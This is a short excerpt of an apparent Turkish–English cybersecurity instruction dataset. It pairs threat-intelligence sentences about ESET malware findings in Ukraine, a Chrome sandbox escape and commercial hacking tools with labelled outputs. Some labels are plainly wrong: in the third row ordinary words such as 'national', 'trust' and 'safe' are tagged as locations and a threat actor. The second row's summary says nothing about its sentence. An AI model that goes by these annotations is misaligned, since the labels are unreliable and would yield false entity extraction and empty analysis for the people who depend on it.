Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Additionally, ESET researchers have warned that they found this malware installed across “hundreds of machines” in Ukraine. | identity: ESET; location: Ukraine |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The sandbox escape was loaded directly as an ELF binary embedding libchrome.so and a custom libmojo_bridge.so was used to ease the communication with the Mojo IPCs. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The proliferation of commercial hacking tools is a threat to national security, making the Internet less safe and undermining the trust on which a vibrant, inclusive digital society depends. | location: national; location: security; threat-actor: safe; location: and; location: trust |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.